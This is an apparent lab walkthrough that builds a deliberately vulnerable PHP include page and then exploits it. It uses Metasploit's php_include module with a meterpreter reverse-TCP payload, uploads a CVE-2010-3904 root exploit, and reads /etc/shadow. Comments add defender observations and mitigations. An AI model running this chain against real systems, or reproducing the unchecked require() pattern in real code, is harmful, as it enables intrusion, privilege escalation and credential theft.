Demonstration of an RFI (Remote File Inclusion) attack followed by a privilege escalation, both carried out through Metasploit. The privilege escalation uses CVE-2010-3904, a vulnerability in the Linux RDS protocol implementation.
Vulnerable web page creation
# Lab setup: build a deliberately vulnerable PHP page in directory "1".
mkdir 1
# The PHP source that follows is the content entered into 1/index.php in the editor.
vi 1/index.php
<?php
# Default include target: blue.php.
$color='blue';
# NOTE(review): the COLOR request parameter is copied into $color without any
# validation, so the client decides what string reaches require() below.
if(isset($_REQUEST['COLOR'])) { $color = $_REQUEST['COLOR']; }
# This is the file-inclusion flaw: a request-controlled value is concatenated
# with '.php' and included. Remote inclusion additionally depends on PHP's
# allow_url_include being enabled; keeping it Off and mapping COLOR onto a
# fixed allowlist of file names removes the flaw.
require ($color . '.php');
?>
# Gives the apache account ownership of the whole directory, so code running
# as the web server can also write there; a served page does not need that.
chown -R apache:apache 1
Vulnerable web page exploitation through Metasploit
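# Transcript in three stages: msfconsole module setup, the resulting
# meterpreter session, and an interactive shell opened from that session.
# Commands that the page extraction had fused onto one line are separated.

# --- Stage 1: msfconsole, php_include module against the lab page ---
use exploit/unix/webapp/php_include
show options
set PATH /1/
# XXpathXX is the placeholder for the parameter value the module supplies.
set PHPURI /index.php?COLOR=XXpathXX
# Target web server.
set RHOST 192.168.178.47
# Look up the local address used for SRVHOST / LHOST below.
ifconfig
set SRVHOST 192.168.178.21
show options
set PAYLOAD php/meterpreter_reverse_tcp
show options
set LHOST 192.168.178.21
# Defender view: the access log on 192.168.178.47 records a request to
# /1/index.php whose COLOR value is a URL, and the web server then makes
# outbound connections to 192.168.178.21. Web servers seldom need to
# initiate outbound traffic, so egress filtering both blocks and reveals this.
exploit

# --- Stage 2: meterpreter session running as the web server account ---
getuid
getpid
ps
sysinfo
pwd
ls
cat index.php
# Read attempt before escalation; the transcript shows no output, presumably
# denied because the session is not root yet.
cat /etc/shadow
# The source read `lwpd`; meterpreter's local-directory command is `lpwd`.
lpwd
lcd /home/eromang/exploits/linux/local_escalations
# The binary is written into the session's remote working directory
# (presumably the apache-owned web directory; confirm against the pwd output).
# Defender view: a new executable appearing under the web root, and bash
# spawned by the PHP/web server process, are both high-signal events for
# file-integrity and process monitoring.
upload linux-rds-exploit_CVE-2010-3904
execute -i -f bash

# --- Stage 3: interactive shell, local privilege escalation ---
# id is run before and after to compare the effective user.
id
chmod u+x linux-rds-exploit_CVE-2010-3904
# Mitigation for CVE-2010-3904: install the vendor kernel update; where RDS is
# not used, prevent the rds kernel module from loading.
./linux-rds-exploit_CVE-2010-3904
id
# Repeated read of /etc/shadow to confirm the privilege change.
cat /etc/shadow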